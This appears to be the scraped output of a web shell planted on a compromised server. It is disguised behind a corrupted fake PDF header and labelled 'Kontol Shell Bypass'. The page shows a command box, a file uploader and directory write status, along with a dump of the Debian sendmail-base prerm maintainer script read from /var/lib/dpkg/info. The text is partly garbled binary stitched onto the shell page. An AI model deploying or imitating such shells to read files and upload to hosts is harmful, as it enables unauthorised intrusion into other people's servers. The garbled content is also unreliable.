%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/lib/dpkg/info/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //var/lib/dpkg/info/sendmail-base.prerm
#!/bin/sh
set -e;

PACKAGE=sendmail-base;

if [ "$1" = "remove" ]; then
		if [ -x /usr/sbin/update-inetd ]; then
			update-inetd --group MAIL --disable smtp,smtps,submission;
			fi;

		# Make sure /etc/aliases is left (move it from /etc/mail if needed)
		if [ -L /etc/mail/aliases ]; then
			rm -f /etc/mail/aliases;
		elif [ -f /etc/mail/aliases ] \
		&&   [ -L /etc/aliases ]; then
			mv /etc/mail/aliases /etc/aliases;
			fi;

		# Remove pseudo conffiles (managed by sendmail)
		rm -f	/etc/cron.d/sendmail;

		# Remove files scattered across the system that
		# happened to be created by sendmail
		rm -f /usr/lib/sasl/Sendmail.conf

		# Remove those files created by sendmail
		rm -rf	/var/lib/sendmail;
		rm -rf	/var/run/sendmail;
		# Note: syslog really owns these files
		#rm -f	/var/log/mail/*;
		#rm -f	/var/log/mail.log;
		# Note: these can lead to a loss of mail!!!!
		if [ -x /etc/init.d/sendmail ]; then
			/etc/init.d/sendmail clean;
			fi;
		if [ -L /var/spool/mqueue ]; then
			rmdir --ignore-fail-on-non-empty \
			`readlink -fn /var/spool/mqueue`;
		elif [ -d /var/spool/mqueue ]; then
			rmdir	--ignore-fail-on-non-empty \
				/var/spool/mqueue;
			fi;
		if [ -L /var/spool/mqueue-client ]; then
			rmdir	--ignore-fail-on-non-empty \
			`readlink -fn /var/spool/mqueue-client`;
		elif [ -d /var/spool/mqueue-client ]; then
			rmdir	--ignore-fail-on-non-empty \
				/var/spool/mqueue-client;
			fi;

		# Remove sendmail built configuration files
		rm -f	/etc/mail/*.db \
			/etc/mail/*.dir \
			/etc/mail/*.pag;
		rm -f	/etc/mail/sendmail.cf \
			/etc/mail/sendmail.cf.old \
			/etc/mail/sendmail.cf.errors \
			/etc/mail/sendmail.mc.old \
			/etc/mail/submit.cf \
			/etc/mail/submit.cf.errors \
			/etc/mail/submit.mc.old \
			/etc/mail/databases \
			/etc/mail/Makefile \
			;
		rm -rf /etc/mail/smrsh \
			/etc/mail/sasl \
			/etc/mail/tls;

		# Remove empty files (probably touched databases)
		find /etc/mail -maxdepth 1 -size 0 | xargs -r rm;
fi

if [ "$1" = "upgrade" ]; then
		# Potentially move the old configuration file to the new name -
		# before it gets deleted (for not existing in the new package)
		mv -f /etc/default/sendmail \
			/etc/mail/sendmail.conf 2>/dev/null || true;

		# Prevent cronjob from running during upgrade...
		if [ -f /etc/cron.d/sendmail ]; then
			echo "#prerm" > /etc/cron.d/sendmail;
			fi;
fi

# Automatically added by dh_installdeb/11.1.4ubuntu1
dpkg-maintscript-helper rm_conffile /etc/dhcp3/dhclient-exit-hooks.d/sendmail 8.14.4-2.2\~ -- "$@"
# End automatically added section


Kontol Shell Bypass